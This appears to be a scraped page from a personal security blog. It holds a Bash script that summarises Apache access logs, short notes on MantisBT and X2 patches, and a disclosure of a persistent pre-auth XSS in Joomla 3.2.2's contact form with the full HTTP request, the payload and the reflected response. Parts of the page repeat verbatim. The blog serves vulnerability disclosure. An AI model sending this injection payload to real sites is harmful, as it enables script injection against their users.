As far as I can see at logs of my Apache, last few weeks was very busy for few guys trying to hack my honeypot ;)
Good job guys!
For some reason I decided to create a very simple (but useful) 'log-reader' for Apache.
You can obviously add it to cron or just run as a normal Bash script.
Here you have a code:
---<code>---
#!/bin/sh
ACCESS="/var/log/apache2/access.log"
FOUND="found.log"
UNIQ="uniq.log"
echo
echo "**** Test Apache logs... ****"
echo
cut -d' ' -f1 $ACCESS > $FOUND
cat $FOUND | uniq > $UNIQ
echo "[+] Found host(s) : " `wc -l $UNIQ`
for host in `cat $UNIQ`; do
echo "--------------------------------------------------------------"
echo "[+] Testing : " $host
host $host
whois $host | grep -e "country\|address"
echo ""
echo "[+] looking for: "
grep $host $ACCESS | cut -d' ' -f 6-8
echo "--------------------------------------------------------------"
done
---<code>---
Monday, 31 March 2014
Wednesday, 26 March 2014
[EN] X2 Community - update for you
Few days ago I found that X2 is vulnerable to few web attacks.
After great work of X2 Team, below you will find a link to informations about
new update.
Check here ;)
Great job X2 Team!
After great work of X2 Team, below you will find a link to informations about
new update.
Check here ;)
Great job X2 Team!
Monday, 3 March 2014
[EN] New release of MantisBT 1.2.17
After last patching of MantisBT, there is a fresh and new version!
Check the details about new release and remember to install the patch ;)
More details about this finding you can get here or here
Once again big thanks for the excellent cooperation goes to the Dev Team of Mantis!
Great job!
Check the details about new release and remember to install the patch ;)
More details about this finding you can get here or here
Once again big thanks for the excellent cooperation goes to the Dev Team of Mantis!
Great job!
[EN] Joomla 3.2.2 pre-auth persistent XSS
Maybe you want to verify... ;)
# ==============================================================
# Title ...| Persistent pre-auth XSS in Joomla
# Version .| Joomla 3.2.2
# Date ....| 3.03.2014
# Found ...| HauntIT Blog
# Home ....| http://www.joomla.org
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/cms/joomla/index.php/single-contact HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 288
jform%5Bcontact_name%5D=aaaaaa&jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com&jform%5Bcontact_subject%5D=asdas&jform%5Bcontact_message%5D=dasdasdasd&jform%5Bcontact_email_copy%5D=1&option=com_contact&task=contact.submit&return=&id=1%3Aname&e328236e3b63be0be16a0d0d841f63f9=1
---<request>---
And:
---<response>---
(...)
title="<strong>Email</strong><br />Email for contact">Email<span class="star"> *</span></label></div>
<div class="controls"><input type="email" name="jform[contact_email]" class="validate-email" id="jform_contact_email" value="a"><body onload=alert(123)>@b.com" size="30" required aria-required="true" /></div>
</div>
(...)
---<response>---
From Burp it looks like this:
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# ==============================================================
# Title ...| Persistent pre-auth XSS in Joomla
# Version .| Joomla 3.2.2
# Date ....| 3.03.2014
# Found ...| HauntIT Blog
# Home ....| http://www.joomla.org
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/cms/joomla/index.php/single-contact HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 288
jform%5Bcontact_name%5D=aaaaaa&jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com&jform%5Bcontact_subject%5D=asdas&jform%5Bcontact_message%5D=dasdasdasd&jform%5Bcontact_email_copy%5D=1&option=com_contact&task=contact.submit&return=&id=1%3Aname&e328236e3b63be0be16a0d0d841f63f9=1
---<request>---
 |
| Joomla XSS - request |
And:
---<response>---
(...)
title="<strong>Email</strong><br />Email for contact">Email<span class="star"> *</span></label></div>
<div class="controls"><input type="email" name="jform[contact_email]" class="validate-email" id="jform_contact_email" value="a"><body onload=alert(123)>@b.com" size="30" required aria-required="true" /></div>
</div>
(...)
---<response>---
From Burp it looks like this:
 |
| XSS - view from Burp |
Response at the page:
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Subscribe to:
Posts (Atom)